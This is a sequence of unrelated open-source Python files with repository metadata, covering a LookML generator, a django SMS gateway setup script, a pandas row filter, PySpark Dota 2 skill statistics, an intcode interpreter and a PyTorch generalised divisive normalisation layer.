if value_in_seconds >= seconds_in_unit:
value = value_in_seconds / seconds_in_unit
return value, unit
raise ValueError("`value_in_seconds` is smaller than the smallest time unit.")
def _round_appropriately(value: float, unit: str) -> Union[int, float]:
"""Round *up* to 2 significant figures
(except for unit="days", and value>=100, which is just rounded
to the nearest whole number).
Round up because it's better to overestimate than underestimate
time taken.
"""
num_integer_digits = len(str(int(value)))
if num_integer_digits <= 1:
return math.ceil(value * 10) / 10
elif num_integer_digits == 2:
return math.ceil(value)
elif num_integer_digits == 3:
if unit == "days":
return math.ceil(value)
return math.ceil(value / 10) * 10
else:
if unit == "days":
return math.ceil(value)
raise ValueError("Should not have more than 3 digits.")
| 31.566667 | 82 | 0.637276 |
f9ff74d919dcc09d02f35b81da80d879d34feb93 | 6,458 | py | Python | lookmlgen/view.py | jimmyshah/lookml-gen2 | 7814d2ea6cf302ef7b937e3365d047b09a9878b4 | [
"Apache-2.0"
] | 31 | 2017-04-18T03:40:38.000Z | 2022-02-14T23:06:02.000Z | lookmlgen/view.py | jimmyshah/lookml-gen2 | 7814d2ea6cf302ef7b937e3365d047b09a9878b4 | [
"Apache-2.0"
] | 368 | 2017-05-15T07:43:38.000Z | 2022-03-28T08:55:21.000Z | lookmlgen/view.py | jimmyshah/lookml-gen2 | 7814d2ea6cf302ef7b937e3365d047b09a9878b4 | [
"Apache-2.0"
] | 10 | 2017-05-23T03:45:23.000Z | 2021-08-10T20:19:55.000Z | """
File name: view.py
Author: joeschmid
Date created: 4/8/17
"""
import json
from collections import OrderedDict
try:
from textwrap import indent
except ImportError:
from .util import indent
from .base_generator import BaseGenerator
from .field import FieldType
class View(BaseGenerator):
"""Generates a LookML View
Initialize a View object with your parameters,
add Fields such as :class:`~lookmlgen.field.Dimension`,
:class:`~lookmlgen.field.Measure`,
:class:`~lookmlgen.field.DimensionGroup`, and
:class:`~lookmlgen.field.Filter`, and then
generate LookML for the view using :py:meth:`~View.generate_lookml`
:param name: Name of the view
:param label: Label to use for the view (may contain spaces)
:param sql_table_name: Name of the SQL table to use in the view
:param file: File handle of a file open for writing or a
StringIO object
:type name: string
:type label: string
:type sql_table_name: list of strings
:type file: File handle or StringIO object
"""
def __init__(self, name, label=None, sql_table_name=None, file=None):
super(View, self).__init__(file=file)
self.name = name
self.label = label
self.sql_table_name = sql_table_name
self.fields = OrderedDict()
self.derived_table = None
def generate_lookml(self, file=None, format_options=None):
""" Writes LookML for the view to a file or StringIO buffer.
:param file: File handle of a file open for writing or a
StringIO object
:param format_options: Formatting options to use during generation
:type file: File handle or StringIO object
:type format_options:
:class:`~lookmlgen.base_generator.GeneratorFormatOptions`
"""
if not file and not self.file:
raise ValueError('Must provide a file in either the constructor '
'or as a parameter to generate_lookml()')
f = file if file else self.file
fo = format_options if format_options else self.format_options
if fo.warning_header_comment:
f.write(fo.warning_header_comment)
f.write('view: {self.name} {{\n'.format(self=self))
if self.sql_table_name:
f.write('{indent}sql_table_name: {self.sql_table_name} ;;\n'.
format(indent=' ' * fo.indent_spaces, self=self))
if self.label:
f.write('{indent}label: "{self.label}"\n'.
format(indent=' ' * fo.indent_spaces, self=self))
if fo.newline_between_items:
f.write('\n')
if self.derived_table:
self.derived_table.generate_lookml(file=f, format_options=fo)
if fo.newline_between_items:
f.write('\n')
if fo.view_fields_alphabetical:
self.__ordered_fields = sorted(self.fields.items())
else:
self.__ordered_fields = self.fields.items()
self.__generated_fields = []
self._gen_fields(f, fo, [FieldType.FILTER])
self._gen_fields(f, fo, [FieldType.DIMENSION, FieldType.DIMENSION_GROUP])
self._gen_fields(f, fo, [FieldType.MEASURE])
f.write('}\n')
return
def add_field(self, field):
"""Adds a :class:`~lookmlgen.field.Field` object to a :class:`View`"""
self.fields[field.name] = field
return
def set_derived_table(self, derived_table):
"""Adds a :class:`~lookmlgen.view.DerivedTable` object to a
:class:`View`
"""
self.derived_table = derived_table
def _gen_fields(self, f, fo, field_types):
for k, d in self.__ordered_fields:
if d.field_type not in field_types:
continue
if len(self.__generated_fields) != 0 and fo.newline_between_items:
f.write('\n')
d.generate_lookml(file=f, format_options=fo)
self.__generated_fields.append(d)
class DerivedTable(BaseGenerator):
"""Generates the LookML View parameters to support derived
tables, including persistent derived tables (PDTs).
:param sql: SQL statement to execute
:param sql_trigger_value: SQL to determine when to trigger build
:param indexes: List of coluxn names to use as indexes
:param file: File handle of a file open for writing or a StringIO object
:type sql: string
:type sql_trigger_value: string
:type indexes: list of strings
:type file: File handle or StringIO object
"""
def __init__(self, sql, sql_trigger_value=None, indexes=None, file=None):
super(DerivedTable, self).__init__(file=file)
self.sql = sql
self.sql_trigger_value = sql_trigger_value
self.indexes = indexes
def generate_lookml(self, file=None, format_options=None):
""" Writes LookML for a derived table to a file or StringIO buffer.
:param file: File handle of a file open for writing or a
StringIO object
:param format_options: Formatting options to use during generation
:type file: File handle or StringIO object
:type format_options:
:class:`~lookmlgen.base_generator.GeneratorFormatOptions`
"""
if not file and not self.file:
raise ValueError('Must provide a file in either the constructor '
'or as a parameter to generate_lookml()')
f = file if file else self.file
fo = format_options if format_options else self.format_options
f.write('{indent}derived_table: {{\n'.
format(indent=' ' * fo.indent_spaces))
if self.sql:
final_sql = ' ' + self.sql if '\n' not in self.sql \
else '\n' + indent(self.sql, ' ' * 3 * fo.indent_spaces)
f.write('{indent}sql:{sql} ;;\n'.
format(indent=' ' * 2 * fo.indent_spaces, sql=final_sql))
if self.sql_trigger_value:
f.write('{indent}sql_trigger_value: '
'{self.sql_trigger_value} ;;\n'.
format(indent=' ' * 2 * fo.indent_spaces, self=self))
if self.indexes:
f.write('{indent}indexes: {indexes}\n'.
format(indent=' ' * 2 * fo.indent_spaces,
indexes=json.dumps(self.indexes)))
f.write('{indent}}}\n'.format(indent=' ' * fo.indent_spaces))
| 38.670659 | 81 | 0.623877 |
e6009ec1e028167f3a49c3031f357398c17f1387 | 663 | py | Python | models/functions/main.py | hkennyv/meowbot | c5a0d3c2a21cc0ef1bc5f266e15e3a8ca6f1fb02 | [
"MIT"
] | null | null | null | models/functions/main.py | hkennyv/meowbot | c5a0d3c2a21cc0ef1bc5f266e15e3a8ca6f1fb02 | [
"MIT"
] | null | null | null | models/functions/main.py | hkennyv/meowbot | c5a0d3c2a21cc0ef1bc5f266e15e3a8ca6f1fb02 | [
"MIT"
] | null | null | null | import os
from flask import jsonify
from utils import generate_text_from_model
def handler(request):
url = request.url
prompt = request.args.get("prompt", None)
n = int(request.args.get("n", 1))
print(f"{url=} {prompt=} {n=}")
res = generate_text_from_model(n, prompt, min_length=25)
return (
jsonify(
{
"version": 0.1,
"entry_point": os.environ.get("ENTRY_POINT", ""),
"function_name": os.environ.get("FUNCTION_NAME", ""),
"region": os.environ.get("FUNCTION_REGION", ""),
"results": res,
}
),
200,
)
| 23.678571 | 69 | 0.529412 |
e6032655721c54e66ad4bd1357c8c09c9c05f5d4 | 1,788 | py | Python | setup.py | vikingco/django-smsgateway | 91675e599a147f4d7e64ff4c4455dbf75ed753d3 | [
"BSD-3-Clause"
] | 13 | 2015-03-11T06:55:50.000Z | 2022-02-08T16:50:16.000Z | setup.py | vikingco/django-smsgateway | 91675e599a147f4d7e64ff4c4455dbf75ed753d3 | [
"BSD-3-Clause"
] | 17 | 2015-03-19T12:27:41.000Z | 2019-12-09T14:21:21.000Z | setup.py | vikingco/django-smsgateway | 91675e599a147f4d7e64ff4c4455dbf75ed753d3 | [
"BSD-3-Clause"
] | 7 | 2015-05-15T00:14:49.000Z | 2019-06-27T02:46:09.000Z | from setuptools import setup, find_packages
from pip._internal.req.req_file import parse_requirements
from pip._internal.download import PipSession
from os import path
from smsgateway import __version__
# Lists of requirements and dependency links which are needed during runtime, testing and setup
install_requires = []
tests_require = []
dependency_links = []
# Inject test requirements from requirements_test.txt into setup.py
requirements_file = parse_requirements(path.join('requirements', 'requirements.txt'), session=PipSession())
for req in requirements_file:
install_requires.append(str(req.req))
if req.link:
dependency_links.append(str(req.link))
# Inject test requirements from requirements_test.txt into setup.py
requirements_test_file = parse_requirements(path.join('.', 'requirements', 'requirements_test.txt'), session=PipSession())
for req in requirements_test_file:
tests_require.append(str(req.req))
if req.link:
dependency_links.append(str(req.link))
setup(
name='django-smsgateway',
version=__version__,
url='https://github.com/vikingco/smsgateway',
license='BSD',
description='SMS gateway for sending text messages',
long_description=open('README.rst', 'r').read(),
author='Unleashed NV',
author_email='operations@unleashed.be',
packages=find_packages('.'),
include_package_data=True,
zip_safe=False,
install_requires=install_requires,
setup_requires=['pytest-runner', ],
tests_require=tests_require,
dependency_links=dependency_links,
classifiers=[
'Intended Audience :: Developers',
'Programming Language :: Python',
'Operating System :: OS Independent',
'Environment :: Web Environment',
'Framework :: Django',
],
)
| 33.735849 | 122 | 0.73434 |
e603924130bfa4f0b3913ce47ce5a8e5befed2ec | 2,394 | py | Python | querier/queries/filtr.py | Techtonique/querier | 47288fc78273f248199fc67b50e96eaa7dd5441a | [
"BSD-3-Clause-Clear"
] | 2 | 2020-09-18T14:58:28.000Z | 2021-07-14T11:57:14.000Z | querier/queries/filtr.py | Techtonique/querier | 47288fc78273f248199fc67b50e96eaa7dd5441a | [
"BSD-3-Clause-Clear"
] | null | null | null | querier/queries/filtr.py | Techtonique/querier | 47288fc78273f248199fc67b50e96eaa7dd5441a | [
"BSD-3-Clause-Clear"
] | null | null | null | # Authors: Thierry Moudiki
#
# License: BSD 3
import numpy as np
from ..utils import parse_request
from ..utils import memoize
# filtr(df, 'tip > 5')
# req = "(time == 'Dinner') & (day == 'Sun') & (tip>1.5)"
# filtr(df, req, limit=3, random=False)
# filtr(df, req, limit=4, random=True)
#
# req = "(tip>1.5)"
# filtr(df, req, limit=7, random=False)œ
# filtr(df, req, limit=5, random=True)
#
# req = "(tip > 5) & (size > 3)"
# filtr(df, req, limit=5, random=False)
# filtr(df, req, limit=8, random=True)
#
# req = "(tip > 5) & (size > 3) & (sex == 'Male')"
# filtr(df, req, limit=7, random=False)
# filtr(df, req, limit=8, random=True)
@memoize
def filtr(df, req=None, limit=None, random=False, seed=123):
""" Filter rows, based on given criteria.
Args:
req: str
criteria for filtering the rows
limit: int
number of records to be retrieved
random: bool
`True` if we want a random set of records
seed: int
reproducibility seed for situations where `random == True`
Examples:
https://github.com/thierrymoudiki/querier/tree/master/querier/demo
"""
if req is None: # useless tho...
return df
# if request is not None:
n, p = df.shape
str_conds = parse_request(req)
df_res = df[eval(str_conds)]
if limit is not None:
assert int(limit) == limit, "limit must be an integer"
if random == False:
try:
return df_res.head(limit)
except:
raise ValueError(
"invalid request: check column names + contents (and parentheses for multiple conditions)"
)
# if random == True:
try:
np.random.seed(seed)
return df_res.iloc[
np.random.choice(
range(0, df_res.shape[0]), size=limit, replace=False
),
]
except:
raise ValueError(
"invalid request: check column names + contents (and parentheses for multiple conditions)"
)
# if limit is None:
try:
return df_res
except:
raise ValueError(
"invalid request: check column names + contents (and parentheses for multiple conditions)"
)
| 25.2 | 110 | 0.543442 |
e605177b0e5e0389026fb9fd1bf99e17303d4553 | 3,310 | py | Python | apps/jobs/dota_parse_curated/insights/skill_insights.py | ajkdrag/Dota-2-Pyspark-EDA | aa64cd06248143703792ad668288518804679735 | [
"MIT"
] | null | null | null | apps/jobs/dota_parse_curated/insights/skill_insights.py | ajkdrag/Dota-2-Pyspark-EDA | aa64cd06248143703792ad668288518804679735 | [
"MIT"
] | null | null | null | apps/jobs/dota_parse_curated/insights/skill_insights.py | ajkdrag/Dota-2-Pyspark-EDA | aa64cd06248143703792ad668288518804679735 | [
"MIT"
] | null | null | null | import pyspark.sql.functions as F
def top_k_most_picked_skills(match_hero_names_df, ohe_heroes_df, k=5):
skills_df = match_hero_names_df.join(
ohe_heroes_df, on=[match_hero_names_df.hero == ohe_heroes_df.name]
).select(ohe_heroes_df.columns[3:])
skills = skills_df.columns
skills_df_agg = skills_df.select([F.sum(col).alias(col) for col in skills])
list_skill_picks = [
F.struct(F.lit(col).alias("skill"), F.col(col).alias("num_picks"))
for col in skills
]
return (
skills_df_agg.select(F.explode(F.array(list_skill_picks)).alias("exploded"))
.select("exploded.*")
.orderBy(F.desc("num_picks"))
.limit(k)
)
def top_k_skills_in_most_wins(
match_hero_names_df, match_details_df, ohe_heroes_df, k=5
):
return top_k_most_picked_skills(
match_hero_names_df.join(
match_details_df,
on=[
match_hero_names_df.match_id == match_details_df.match_id,
match_hero_names_df.team == match_details_df.winner,
],
),
ohe_heroes_df,
k=k,
)
def top_k_skills_with_highest_win_rates(
match_hero_names_df, match_details_df, ohe_heroes_df, k=10
):
merged_df = match_hero_names_df.join(
match_details_df, on=[match_hero_names_df.match_id == match_details_df.match_id]
).select(
[
match_hero_names_df.match_id,
match_hero_names_df.hero,
match_hero_names_df.team,
"winner",
]
)
hero_scores_df = merged_df.withColumn(
"score",
F.when(F.col("winner") == F.col("team"), F.lit(1)).otherwise(F.lit(0)),
)
skills = ohe_heroes_df.columns[3:]
skill_scores_df = hero_scores_df.join(
ohe_heroes_df, on=[hero_scores_df.hero == ohe_heroes_df.name]
)
list_skill_picks = [
F.struct(
F.lit(col).alias("skill"),
(F.col("score") * F.col(col)).alias("wins"),
(F.col(col)).alias("picks"),
)
for col in skills
]
return (
skill_scores_df.select(F.explode(F.array(list_skill_picks)).alias("exploded"))
.select("exploded.*")
.groupBy("skill")
.agg(
F.sum("picks").alias("total_picks"),
F.sum("wins").alias("total_wins"),
)
.withColumn("win_rate", (100 * F.col("total_wins")) / F.col("total_picks"))
.orderBy(F.desc("win_rate"))
.limit(k)
)
def get_all_skill_insights(entities):
match_hero_names_df = entities["match_hero_names"]
ohe_heroes_df = entities["ohe_heroes"]
match_details_df = entities["match_details"]
top_k_most_picked_skills_df = top_k_most_picked_skills(
match_hero_names_df, ohe_heroes_df
)
top_k_skills_in_most_wins_df = top_k_skills_in_most_wins(
match_hero_names_df, match_details_df, ohe_heroes_df
)
top_k_skills_with_highest_win_rates_df = top_k_skills_with_highest_win_rates(
match_hero_names_df, match_details_df, ohe_heroes_df
)
entities["insight_most_picked_skills"] = top_k_most_picked_skills_df
entities["insight_skills_in_most_wins"] = top_k_skills_in_most_wins_df
entities["insight_skills_with_highest_wr"] = top_k_skills_with_highest_win_rates_df
| 31.52381 | 88 | 0.652266 |
e6053698599b3626d8934d6ed2fbd3ec5c67702d | 271 | py | Python | Physics250-ME24/calcChargeonCap.py | illusion173/Physics250 | 69f2ffdb8af013e8b0739779861c1455b579ddaf | [
"MIT"
] | null | null | null | Physics250-ME24/calcChargeonCap.py | illusion173/Physics250 | 69f2ffdb8af013e8b0739779861c1455b579ddaf | [
"MIT"
] | null | null | null | Physics250-ME24/calcChargeonCap.py | illusion173/Physics250 | 69f2ffdb8af013e8b0739779861c1455b579ddaf | [
"MIT"
] | null | null | null | import numpy as np
import math
Esubo = 8.854 * pow(10,-12)
k = 8.988 * pow(10,9)
def calcCharge():
faraday = float(input("Input Faraday: "))
volts = float(input("Input Volts: "))
charge = faraday * volts
print(charge)
calcCharge() | 14.263158 | 45 | 0.583026 |
e6056330329bc68abb7e5b76c93b9c6288226754 | 9,217 | py | Python | expert/layers/divisive_normalisation.py | alexhepburn/expert | 546f7452ced2213ef91e5ce6e7456a1668dd9f95 | [
"BSD-3-Clause"
] | 1 | 2021-04-10T11:34:22.000Z | 2021-04-10T11:34:22.000Z | expert/layers/divisive_normalisation.py | alexhepburn/expert | 546f7452ced2213ef91e5ce6e7456a1668dd9f95 | [
"BSD-3-Clause"
] | null | null | null | expert/layers/divisive_normalisation.py | alexhepburn/expert | 546f7452ced2213ef91e5ce6e7456a1668dd9f95 | [
"BSD-3-Clause"
] | null | null | null | """
The :mod:`expert.layers.divisive_normalisation` module holds classes of
layers for a network that use divisive normalisation. This includes
generalised divisive normalisation.
"""
# Author: Alex Hepburn <alex.hepburn@bristol.ac.uk>
# License: new BSD
import torch
import torch.nn as nn
import torch.nn.functional as F
__all__ = ['GDN']
class GDN(nn.Module):
"""
Generalised Divisve Normalisation proposed in [BALLE2015GDN]_.
The activation function this layer implements when kernel size is 1 is
given by:
.. math::
y[i] = x[i] / sqrt(beta[i] + sum_j(gamma[j, i] * x[j]^2))
where `i` and `j` run over channels.
If the kernel_size is kept to the default value of 1, this represents the
true generalised divisve normalisation proposed in [BALLE2015GDN]_. If the
kernel size is larger than 1, the convolution acts not only channel wise
but also acts spatially. This is called spatial generalised divisive
normalisation.
.. [BALLE2015GDN] Ballé, Johannes, et al. Density Modeling of Images Using
a Generalized Normalization Transformation. Nov. 2015. arxiv.org,
https://arxiv.org/abs/1511.06281v4.
Parameters
----------
n_channels : int
Number of channels that the input to this layer will have.
kernel_size : int, optional (default=1)
Size of the kernel. A square kernel is always used and will have shape
[kernel_size, kernel_size]
stride : int, optional (default=1)
The stride of the convolution in the forward pass.
padding : int, optional (default=0)
The padding to be used in the convolution in the forward pass. In order
to get the output of the convolution to be the same size as the input,
to avoid having to interpolate, then the ``padding`` parameter should
be chosen carefully.
gamma_init : float, optional (default=0.1)
The value that the gamma matrix will be initialised with, it will be
the identity multiplied by this value.
reparam_offset : float, optional (default=2*1e-18)
beta_min : float, optional (default=1e-6)
The minimum value that the beta value can reach.
apply_independently : boolean, optional (default=False)
A boolean that determines whether this operation is applied channel
wise or not. If not, then the divisive normalisation just divides each
channel by a learnable parameter, and they are treated independently.
Raises
------
TypeError
``n_channels`` parameter is not an integer larger than 0. ``stride``
parameter is not an integer larger than 0. ``padding`` parameter is not
an integer larger or equal to 0. ``gamma_init`` parameter is not a
positive float. ``reparam_offset`` parameter is not a positive float.
``beta_min`` parameter is not a positive float. ``apply_independently``
is not a boolean.
Attributes
----------
reparam_offset : float
Reparameterisation offset as to avoid gamma or beta going close to zero
and the gradients when backpropogating to approaching zero.
beta_reparam : float
Reparameterisation offset for the beta parameter specifically.
groups : int
Number of groups to use in the convolution operation. If
``apply_independently`` is ``True`` then this should be 1, otherwise
equal to ``n_channels``.
gamma : torch.Tensor
The torch tensor for the weights to be used in the convolution
operation.
beta : torch.Tensor
The torch tensor for the bias to be used in the convoltuion operation.
"""
def __init__(self,
n_channels: int,
kernel_size: int = 1,
stride: int = 1,
padding: int = 0,
gamma_init: float = .1,
reparam_offset: float = 2**-18,
beta_min: float = 1e-6,
apply_independently: bool = False) -> None:
"""
Constructs a ``GDN`` generalised divisive normalisation class.
"""
super(GDN, self).__init__()
assert self._validate_input(n_channels, kernel_size, stride, padding,
gamma_init, reparam_offset, beta_min,
apply_independently)
self.stride = stride
self.padding = padding
self.reparam_offset = reparam_offset
self.beta_reparam = (beta_min + self.reparam_offset**2)**0.5
if apply_independently:
self.groups = n_channels
else:
self.groups = 1
# Initialise the gamma and beta parameters
gamma_bound = self.reparam_offset
gamma = torch.eye(n_channels, dtype=torch.float)
gamma = gamma.view(n_channels, n_channels, 1, 1)
gamma = gamma.repeat(1, 1, kernel_size, kernel_size)
gamma = torch.sqrt(gamma_init*gamma + self.reparam_offset**2)
gamma = torch.mul(gamma, gamma)
if apply_independently:
gammas = [g[i, :, :] for i, g in enumerate(gamma)]
gamma = torch.stack(gammas).unsqueeze(1)
self.gamma = nn.Parameter(gamma)
beta = torch.ones((n_channels,))
beta = torch.sqrt(beta + self.reparam_offset**2)
self.beta = nn.Parameter(beta)
def _validate_input(self,
n_channels: int,
kernel_size: int,
stride: int,
padding: int,
gamma_init: float,
reparam_offset: float,
beta_min: float,
apply_independently: bool) -> bool:
"""
Validates input of the generalised divisive normalisation class.
For the description of the input parameters and exceptions raised by
this function, please see the documentation of the
:class:`expert.layers.divisive_normalisation.GDN` class.
Returns
-------
is_valid
``True`` if input is valid, ``False`` otherwise.
"""
is_valid = False
if not isinstance(n_channels, int) or n_channels <= 0:
raise TypeError('n_channels parameter must be an integer greater '
'than 0.')
if not isinstance(kernel_size, int) or kernel_size <= 0:
raise TypeError('kernel_size parameter must be an integer greater '
'than 0.')
if not isinstance(stride, int) or stride <= 0:
raise TypeError('stride parameter must be an integer greater than '
'0.')
if not isinstance(padding, int) or padding < 0:
raise TypeError('padding parameter must be a positive integer.')
if not isinstance(gamma_init, float) or gamma_init < 0:
raise TypeError('gamma_init parameter must be a positive float.')
if not isinstance(reparam_offset, float) or reparam_offset < 0:
raise TypeError('reparam_offset parameter must be a positive '
'float.')
if not isinstance(beta_min, float) or beta_min < 0:
raise TypeError('beta_min parameter must be a positive float.')
if not isinstance(apply_independently, bool):
raise TypeError('apply_independently parameter must be a boolean.')
is_valid = True
return is_valid
def clamp_parameters(self) -> None:
"""
Clamps the gamma and beta parameters that are used in the convolution.
The gamma and beta parameters are clamped, ignoring the gradient of
the clamping, to the ``reparam_offset`` and ``beta_reparam``
parameters.
"""
with torch.no_grad():
self.gamma = nn.Parameter(torch.clamp(self.gamma.data,
min=self.reparam_offset))
self.beta = nn.Parameter(torch.clamp(self.beta.data,
min=self.beta_reparam))
def forward(self,
x: torch.Tensor) -> torch.Tensor:
"""
Forward pass of the layer
Parameters
----------
x : torch.Tensor
The input to the layer. Must be of shape [batch_size, channels,
height, width].
Raises
------
TypeError:
Input parameter ``x`` is not of dtype torch.float.
Returns
-------
output : torch.Tensor
Output of the generalised divisive normalisation layer.
"""
if x.dtype != torch.float32:
raise TypeError('Input x must be of type torch.float32.')
self.clamp_parameters()
norm_pool = F.conv2d(torch.mul(x, x), self.gamma, bias=self.beta,
groups=self.groups, stride=self.stride,
padding=self.padding)
norm_pool = torch.sqrt(norm_pool)
_, _, height, width = x.size()
image_size = [int(height), int(width)]
norm_pool = F.interpolate(norm_pool, size=image_size)
output = x / norm_pool
return output
| 39.728448 | 79 | 0.605946 |
e6065f668a6e90368fa3e3ff5c24af7760fb1883 | 738 | py | Python | Visualizer.py | jjeong19/evalHeight_gridMap | 506d1253ce62e7b06ed97555ba1d3ec8140a8335 | [
"MIT"
] | null | null | null | Visualizer.py | jjeong19/evalHeight_gridMap | 506d1253ce62e7b06ed97555ba1d3ec8140a8335 | [
"MIT"
] | null | null | null | Visualizer.py | jjeong19/evalHeight_gridMap | 506d1253ce62e7b06ed97555ba1d3ec8140a8335 | [
"MIT"
] | null | null | null | import numpy as np
import argparse
import scipy.linalg
from mpl_toolkits.mplot3d import Axes3D
from skimage.draw import polygon
import matplotlib.pyplot as plt
import glob
from sklearn import datasets, linear_model
import pdb
import time
parser = argparse.ArgumentParser()
parser.add_argument('--folder', default = "")
args = parser.parse_args()
files = glob.glob(args.folder + "/*.npy")
files = sorted(files)
total_count = len(files)
RMSE_sum_count = 0
for i in range(total_count):
if not i % 3 == 0:
continue
print(files[i])
sample = np.load(files[i])
plt.figure(figsize=(20,20))
plt.imshow(sample,interpolation='none')
plt.colorbar()
plt.show(block=False)
plt.pause(0.2)
plt.close() | 22.363636 | 47 | 0.707317 |
e6067b473594f19a0b7c388916cf26a23f82d960 | 579 | py | Python | thirdparty/org/apache/arrow/flatbuf/VectorType.py | mrocklin/pygdf | 2de9407427da9497ebdf8951a12857be0fab31bb | [
"Apache-2.0"
] | 5 | 2018-10-17T20:28:42.000Z | 2022-02-15T17:33:01.000Z | thirdparty/org/apache/arrow/flatbuf/VectorType.py | mrocklin/pygdf | 2de9407427da9497ebdf8951a12857be0fab31bb | [
"Apache-2.0"
] | 19 | 2018-07-18T07:15:44.000Z | 2021-02-22T17:00:18.000Z | thirdparty/org/apache/arrow/flatbuf/VectorType.py | mrocklin/pygdf | 2de9407427da9497ebdf8951a12857be0fab31bb | [
"Apache-2.0"
] | 2 | 2020-05-01T09:54:34.000Z | 2021-04-17T10:57:07.000Z | # automatically generated by the FlatBuffers compiler, do not modify
# namespace: flatbuf
# /// ----------------------------------------------------------------------
# /// The possible types of a vector
class VectorType(object):
# /// used in List type, Dense Union and variable length primitive types (String, Binary)
OFFSET = 0
# /// actual data, either wixed width primitive types in slots or variable width delimited by an OFFSET vector
DATA = 1
# /// Bit vector indicating if each value is null
VALIDITY = 2
# /// Type vector used in Union type
TYPE = 3
| 34.058824 | 110 | 0.621762 |
e606b4f2c79395b331203078985352a2c129c2b0 | 3,231 | py | Python | 05/solution.py | Hegemege/advent-of-code-2019 | 01c2a84fb205069867453f6ba652813a0005fd88 | [
"MIT"
] | null | null | null | 05/solution.py | Hegemege/advent-of-code-2019 | 01c2a84fb205069867453f6ba652813a0005fd88 | [
"MIT"
] | null | null | null | 05/solution.py | Hegemege/advent-of-code-2019 | 01c2a84fb205069867453f6ba652813a0005fd88 | [
"MIT"
] | null | null | null | MAX_INST_PARAM_COUNT = 3
def run_program(memory, input_buffer):
pc = 0
while True:
result_code, pc_offset = execute_instruction(memory, pc, input_buffer)
if result_code == -1: # Halt instruction
return
if result_code == 0: # Non-jump instructions
pc += pc_offset
elif result_code == 1: # Jump instructions
pc = pc_offset
def execute_instruction(memory, position, input_buffer):
instruction_header = memory[position]
op_code = int(str(instruction_header)[-2:])
if op_code == 99:
return (-1, 1)
# Get parameter modes and pad the rest
parameter_modes_str = str(instruction_header)[:-2][::-1]
parameter_modes_str = parameter_modes_str.ljust(MAX_INST_PARAM_COUNT, '0')
parameter_modes = list(map(int, parameter_modes_str))
# Add and multiply
if op_code == 1 or op_code == 2:
operator = int.__add__ if op_code == 1 else int.__mul__
parameter1 = get_parameter(memory, position, 1, parameter_modes)
parameter2 = get_parameter(memory, position, 2, parameter_modes)
write_addr = memory[position + 3]
memory[write_addr] = operator(parameter1, parameter2)
return (0, 4)
# Input
if op_code == 3:
write_addr = memory[position + 1]
input_value = input_buffer.pop(0)
print("IN".ljust(6, ' ') + str(input_value))
memory[write_addr] = input_value
return (0, 2)
# Output
if op_code == 4:
output_value = get_parameter(memory, position, 1, parameter_modes)
print("OUT".ljust(6, ' ') + str(output_value))
return (0, 2)
# Jump-if-true && jump-if-false
if op_code == 5 or op_code == 6:
parameter1 = get_parameter(memory, position, 1, parameter_modes)
parameter2 = get_parameter(memory, position, 2, parameter_modes)
# A XNOR B
if (parameter1 == 0) == (op_code == 5):
return (0, 3)
return (1, parameter2)
# Less-than && equals
if op_code == 7 or op_code == 8:
operator = int.__lt__ if op_code == 7 else int.__eq__
parameter1 = get_parameter(memory, position, 1, parameter_modes)
parameter2 = get_parameter(memory, position, 2, parameter_modes)
write_addr = memory[position + 3]
memory[write_addr] = 1 if operator(parameter1, parameter2) else 0
return (0, 4)
print("OPCODE NOT IMPLEMENTED:", op_code)
def get_parameter(memory, position, offset, parameter_modes):
return memory[memory[position + offset]] if parameter_modes[offset - 1] == 0 else memory[position + offset]
def part1(part_input):
print("PART 1")
memory = parse_input_file(part_input)
input_buffer = [1]
run_program(memory, input_buffer)
def part2(part_input):
print("PART 2")
memory = parse_input_file(part_input)
input_buffer = [5]
run_program(memory, input_buffer)
def parse_input_file(input_file_contents):
return list(map(int, input_file_contents.split(",")))
if __name__ == '__main__':
with open('input', 'r') as input_file:
input_file_contents = input_file.readline()
part1(input_file_contents)
part2(input_file_contents)
| 31.368932 | 111 | 0.647478 |
e608539fab23c3cf7080aa7205e16f057ed4a51c | 2,132 | py | Python | test/test_coloripy.py | ajshajib/coloripy | 136bad593b3914a5c33dec069df8bf5a44a5815d | [
"MIT"
] | 3 | 2020-06-14T13:12:33.000Z | 2022-01-03T21:41:16.000Z | test/test_coloripy.py | ajshajib/coloripy | 136bad593b3914a5c33dec069df8bf5a44a5815d | [
"MIT"
] | null | null | null | test/test_coloripy.py | ajshajib/coloripy | 136bad593b3914a5c33dec069df8bf5a44a5815d | [
"MIT"
] | null | null | null | """
Tests for `coloripy` module.
"""
import numpy as np
from math import isclose
import coloripy as cp
class TestColoripy(object):
@classmethod
def setup_class(cls):
pass
def test_skew_scale(self):
modes = ['linear', 'square', 'cubic', 'power', 'sqrt']
vals = [0., 0.5, 1.]
for mode, val in zip(modes, vals):
assert isclose(cp.skew_scale(val, mode=mode), val)
def test_get_cmap(self):
standard = np.array([[0.23137255, 0.29803922, 0.75294118],
[0.21960784, 0.41568627, 0.87058824],
[0.23137255, 0.5372549, 0.97647059],
[0.29019608, 0.65490196, 1.0627451 ],
[0.39215686, 0.76862745, 1.12941176],
[0.52941176, 0.87843137, 1.18039216],
[0.67843137, 0.97647059, 1.20784314],
[0.84313725, 1.0627451, 1.21568627],
[1.00784314, 1.12941176, 1.21176471],
[1.17254902, 1.17647059, 1.19607843],
[1.32941176, 1.19607843, 1.17647059],
[1.2745098 , 1.14901961, 1.03137255],
[1.22745098, 1.0745098, 0.87843137],
[1.18431373, 0.98431373, 0.7254902 ],
[1.14117647, 0.87843137, 0.58431373],
[1.09019608, 0.76078431, 0.45490196],
[1.03137255, 0.63137255, 0.34901961],
[0.96470588, 0.50196078, 0.26666667],
[0.88627451, 0.36862745, 0.20784314],
[0.8, 0.22745098, 0.17254902],
[0.70588235, 0.01568627, 0.14901961]])
rgb1 = np.array([59, 76, 192])
rgb2 = np.array([180, 4, 38])
ref_point = [221., 221., 221.]
cmap = cp.MshColorMap(rgb1, rgb2, ref_point=ref_point,
num_bins=21).get_colormap()
assert isclose(np.sum(cmap-standard), 0., abs_tol=1e-8)
@classmethod
def teardown_class(cls):
pass
| 38.071429 | 66 | 0.486867 |
e609e4bd2d6607c75f66f23c28efe8a4fdb25c1b | 1,080 | py | Python | xxmodularsynth/midi/clock_external.py | xavierxeon-music/MusicTools | 05c74218df18c4ee385895b721c7ad24ea0df552 | [
"MIT"
] | null | null | null | xxmodularsynth/midi/clock_external.py | xavierxeon-music/MusicTools | 05c74218df18c4ee385895b721c7ad24ea0df552 | [
"MIT"
] | null | null | null | xxmodularsynth/midi/clock_external.py | xavierxeon-music/MusicTools | 05c74218df18c4ee385895b721c7ad24ea0df552 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
